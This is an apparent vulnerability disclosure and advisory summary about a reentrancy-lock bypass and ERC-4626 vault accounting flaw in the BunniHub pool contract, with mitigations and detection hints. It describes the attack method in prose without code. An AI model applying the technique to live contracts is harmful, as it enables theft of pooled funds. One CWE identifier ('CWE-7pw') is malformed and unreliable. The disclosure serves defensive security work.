Full Report
The contract BunniHub is a pool contract. There was a vulnerability that allowed for calling back into this code while the pool was in an unintended state, classic reentrancy, via a user-defined hook. Inevitably, this would have led to lost user funds. Pashov audits found this reentrancy vulnerability during their audit. To mitigate the original issue, they introduced a set of functions for prevent reentrancy. This was done by adding two functions: lockForRebalance and unlockForRebalance. This locked the rebalance before the order and unlocked it once the order was executed. These locks are per contract and not per pool. A Bunni pool can have a hook contract that triggers this functionality registered by anyone. Since the locks are global, an attacker can create a hook contract, call it and disable the reentrancy lock themselves. Now, manipulation is the same as before and leads to loss of funds. Cyfrin, a web3 auditing company, found this bypass. To patch the issue immediately, they created a whitelist on who is able to execute rebalancing actions. The attack was prevented, theoretically. To be cautious, they asked Cyfrin if any other reentrancy attacks were still possible and they did more research into it. They found a similar vulnerability when interacting with a malicious ERC-4626 vault that broke the accounting of the pool to withdraw more assets than they should be able to. To resolve this new issue, all functionality was paused until a proper fix could be made. The contracts were audited by Pashov Audit Group and Trail of Bits. Currently, and they are being audited by Cyfrin as part of the Uniswap Foundation Security Fund. Patching vulnerabilities is hard; patches need to be taken really seriously when they're suggested. Otherwise, you'll end up with more issues like this.
Analysis Summary
# Vulnerability: BunniHub Reentrancy Lock Bypass and Accounting Manipulation
## CVE Details
- **CVE ID**: Not yet assigned (Protocol-specific bug disclosure)
- **CVSS Score**: 9.1 - 10.0 (Team assessment: **Critical**)
- **CWE**: CWE-7pw (Reentrancy), CWE-602 (Client-Side Enforcement of Server-Side Security), CWE-670 (Always-Incorrect Control Flow Implementation)
## Affected Systems
- **Products**: Bunni Protocol (BunniHub)
- **Versions**: Production deployments prior to May 2, 2025
- **Configurations**: Any Bunni pool utilizing the `BunniHub` contract where `am-AMM` (Automated Market Maker) functionality or custom hooks/vaults are enabled.
## Vulnerability Description
The vulnerability consists of two primary flaws stemming from an inadequate security patch for a previous reentrancy finding (C-03):
1. **Global Lock Manipulation**: BunniHub implemented `lockForRebalance()` and `unlockForRebalance()` to prevent reentrancy during complex pool operations. However, these locks were global rather than per-pool. Because any user could register a pool with a malicious `hook` contract, an attacker could call `unlockForRebalance()` from their own malicious hook to disable the global reentrancy protection for the entire protocol.
2. **ERC-4626 Vault Accounting Flow**: A secondary issue involved malicious ERC-4626 vaults. When interacting with these vaults, `_updateRawBalanceIfNeeded()` could be triggered. If a malicious vault/hook combination was used, an attacker could re-enter the contract after state transitions but before final accounting updates, allowing them to withdraw more assets than they were entitled to by manipulating the cached pool reserves.
## Exploitation
- **Status**: PoC available (confirmed by Cyfrin and Bunni team); Not exploited in the wild.
- **Complexity**: High (Requires deploying malicious hooks and ERC-4626 vaults and orchestrating multi-step reentrancy).
- **Attack Vector**: Network (Smart Contract Interaction).
## Impact
- **Confidentiality**: None
- **Integrity**: Critical (Complete corruption of pool accounting)
- **Availability**: High (Led to protocol-wide pausing of rebalancing features)
- **Total Impact**: Possible total loss of Total Value Locked (TVL) across all `BunniHub` assets.
## Remediation
### Patches
- The protocol is currently undergoing a comprehensive audit by **Cyfrin** under the Uniswap Foundation Security Fund. Fixed contracts are pending deployment following the conclusion of this audit.
### Workarounds
- **Function Pausing**: The Bunni team utilized the contract's emergency "partial pause" feature to disable `BunniHub::unlockForRebalance()`.
- **Whitelist Implementation**: An immediate temporary fix involved whitelisting specific addresses authorized to execute rebalancing actions, effectively neutralizing the permissionless nature of the malicious hook attack.
## Detection
- **Indicators of Compromise**: Transactions calling `unlockForRebalance()` from unauthorized or newly deployed hook contracts; unexpected discrepancies between `BunniHub` internal raw balances and actual vault reserves.
- **Detection Methods**: Monitoring for reentrancy events on-chain; static analysis of hook registration to ensure only audited/trusted hooks are interacting with global state locks.
## References
- Bunni Diaries Bug Disclosure: hxxps://blog[.]bunni[.]xyz/posts/bug-disclosure-reentrancy-lock-bypass/
- Pashov Audit Report: hxxps://github[.]com/pashov/audits/blob/master/team/pdf/Bunni-security-review-August[.]pdf
- Cyfrin Security: hxxps://www[.]cyfrin[.]io/